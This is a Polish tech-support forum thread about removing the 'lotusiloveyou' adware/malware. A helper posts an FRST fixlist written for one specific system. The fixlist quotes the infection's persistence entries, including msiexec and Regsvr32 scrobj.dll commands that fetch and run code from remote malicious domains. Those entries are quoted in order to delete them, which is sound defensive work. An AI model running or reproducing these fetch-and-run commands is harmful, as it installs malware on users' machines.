lukrpz Opublikowano 25 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 25 Kwietnia 2017 Witam. Ze względu na to, że mam taki sam problem jak kolega Pibosz https://www.fixitpc.pl/topic/32446-jak-usun%C4%85%C4%87-urlmal-lotusiloveyou/ postanowiłem skopiować jego temat: "Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, jednak w przypadku tego drugiego nie mogłem zaznaczyć wszystkich elementów do skanowania (jedynie usługi, rejestr i pliki). Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. W załączniku dodaję raporty ze skanów." Będę wdzięczny za równie skuteczną pomoc. gmer.txt Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 No cóż...jest infekcja faktycznie identyczna jak w tamtym temacie, ale na przyszłość: nie podoba mi się kopiowanie opisów tematów. To niszczy strukturę forum, każdy przypadek jest indywidualny i wole mieć opis również indywidualny. 1. Spróbuj uruchomić ten plik deinstalacyjny adware: C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-531191069-2322497366-2288422930-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 /q SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-531191069-2322497366-2288422930-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X] U3 tmlwf; Brak ImagePath U3 tmwfp; Brak ImagePath U3 ffrdipoc; \??\C:\Users\Stacle\AppData\Local\Temp\ffrdipoc.sys [X] Task: {020A73A9-C13C-452A-8BCB-B4CBEEBEFA6E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8OTUcMWMyNDQdGdZ2ZTJfnGZ8nAh4nWZ2ZTJfnGZ8 scrobj.dll Task: {151927A4-4E65-4502-AE5F-F7A382ADB41B} - System32\Tasks\{0C959900-9599-4038-AF97-C4598B646275} => pcalua.exe -a C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe -c -ptid=w3i C:\Users\Stacle\AppData\Roaming\webssearches EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
lukrpz Opublikowano 26 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Posłużyłem się cudzym opisem ponieważ mój przypadek był identyczny zarówno jeśli chodzi o objawy jak i o to, że GMER także nie pozwolił na zaznaczenie wszystkich opcji. Mam nadzieję, że kolega Pibosz się nie obraził. Próbowałem uruchomić plik C:\Users\Stacle\AppData\Roaming\webssearches\UninstallManager.exe ale bez powodzenia. Czy może być to spowodowane tym, że jeszcze wczoraj, jakiś czas po przesłaniu raportów ze skanów, uruchomiłem Malwarebytes Anti - Malware? Usunął jakąś grupę podejrzanych struktur. Mam jeszcze raz wykonać raporty? Dodam, że kolejnych punktów nie wykonywałem. Jak widać jestem dosyć tępy w temacie więc proszę o cierpliwość. Jeszcze raz, z góry dziękuję za pomoc. Odnośnik do komentarza
Miszel03 Opublikowano 26 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Ludzie...napisałem instrukcję pod całkowicie nieaktualny obraz systemu. W instrukcjach wyraźnie piszemy, że po generacji raportów na komputerze już nic inwazyjnego nie robimy. Zrób nowe raport FRST oraz GMER, dostarcz też raport z MBAM. Odnośnik do komentarza
lukrpz Opublikowano 26 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 26 Kwietnia 2017 Przepraszam za kłopot ale wczoraj z kompem działo się coś dziwnego - znikąd pojawił się google chrome a firefox przestał działać. No i ogólnie wolno chodził. Zresetowałem go i przeskanowałem MBAM-em. Jeszcze raz przepraszam. Przesyłam jeszcze raz wszystkie raporty i proszę o dalsze wskazówki. Addition.txt FRST.txt Shortcut.txt gmer.txt MBAM.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się